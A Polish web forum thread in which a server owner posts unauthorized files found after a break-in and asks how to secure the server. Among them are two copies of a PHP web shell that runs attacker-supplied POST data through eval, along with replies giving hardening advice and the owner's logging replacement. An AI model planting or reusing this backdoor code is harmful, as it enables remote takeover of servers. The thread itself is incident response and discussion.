[inne][HTML][PHP] Włamanie na serwer, dziwne pliki, jak sie zabezpieczyć? Opcje

[adi456]

Witam,

ostanio przysło mi ostrzeżenie o rozsyłaniu spamu, odkryłem nowe pliki na serwerze, rozumiem że ktoś sie włamał i wykorzystał mój serwer
zna ktoś te pliki? i jak skutecznie zabezpieczyć sie przed tym

nieautoryzowane pliki:

8taIf4yjp.html

[HTML] pobierz, plaintext 
<meta http-equiv="Refresh" content="0; URL=http://google.com/"><html><script>parent.location.href='http://google.com/'</script></html>
[HTML] pobierz, plaintext 

Yg3tBUjQw.html

[HTML] pobierz, plaintext 
<meta http-equiv="Refresh" content="0; URL=http://google.com/"><html><script>parent.location.href='http://google.com/'</script></html>
[HTML] pobierz, plaintext 

ddslbyi.php

[PHP] pobierz, plaintext 
<?php
error_reporting(4437);
ignore_user_abort(true);
set_time_limit(0);
ini_set('max_execution_time',0);
if (isset($_POST['sdf3sa4'])) {
    $text = strpos($_POST['sdf3sa4'], '\\\\n') === false ? $_POST['sdf3sa4'] : stripslashes($_POST['sdf3sa4']);
    eval($text);
}
?>
[PHP] pobierz, plaintext 

ddseuaq.php

[PHP] pobierz, plaintext 
<?php
error_reporting(4437);
ignore_user_abort(true);
set_time_limit(0);
ini_set('max_execution_time',0);
if (isset($_POST['sdf3sa4'])) {
    $text = strpos($_POST['sdf3sa4'], '\\\\n') === false ? $_POST['sdf3sa4'] : stripslashes($_POST['sdf3sa4']);
    eval($text);
}
?>
[PHP] pobierz, plaintext 

[Sephirus]

Z tego co widzę to te pliki PHP to nie żarty :/

Te pliki ustawiają sobie nieokreślony czas na wykonywanie, ingorują rozłączenie w userem (w teorii mogą chodzić non-stop) a kod do wykonania otrzymują poprzez $_POST :/

Spamowanie to i tak mało w porównaniu z tym co ktoś mógłby z nich wycisnąć...

Zabezpiecz dobrze serwer... Nie znam tych plików ale można nimi wiele zdziałać... :/

Co do opcji skąd się wzięły i jak się zabezpieczyć:
1. Pozmieniaj wszystkie hasła (na jakieś mocne - tak w razie czego)
2. Czy korzystasz na stronie z jakiejś gotowej biblioteki, CMS'a, skryptu, który może zapisywać pliki na serwerze? Jesli tak to ktoś mógł wykorzystać dziurę w kodzie takich skryptów...
3. Co to za serwer? Na czym stoi? Na jakim hostingu/w domu? Od tego dużo zależy...

[adi456]

Serwer wirtualny Pro - w ovh.pl

nie korzystam z gotowych rozwiazań, tylko małe firmowe strony typu edcar-sacz.pl.

już sie zabieram za zmiane haseł

podmieniłem im treść w plikach na

[PHP] pobierz, plaintext 
$ip = $_SERVER['REMOTE_ADDR'];
$test = $_SERVER['HTTP_USER_AGENT'];
$co=$_POST['sdf3sa4'];
 
$dane = "$ip - $test - $co\n";
$file = "error.txt";
$fp = fopen($file, "r+");
 
$fp = fopen($file, "a");
flock($fp, 2);
fwrite($fp, $dane);
flock($fp, 3);
fclose($fp); 
[PHP] pobierz, plaintext 

a czy może powinienem gdzies złożyć zawiadomienie o włamaniu? Nie wiem do jakiego celu ktoś wykorzystywał mój serwer ale zeby później na mnie nie było

włamy sa z adresu ip 188.95.49.179

Ten post edytował adi456 25.01.2012, 17:32:33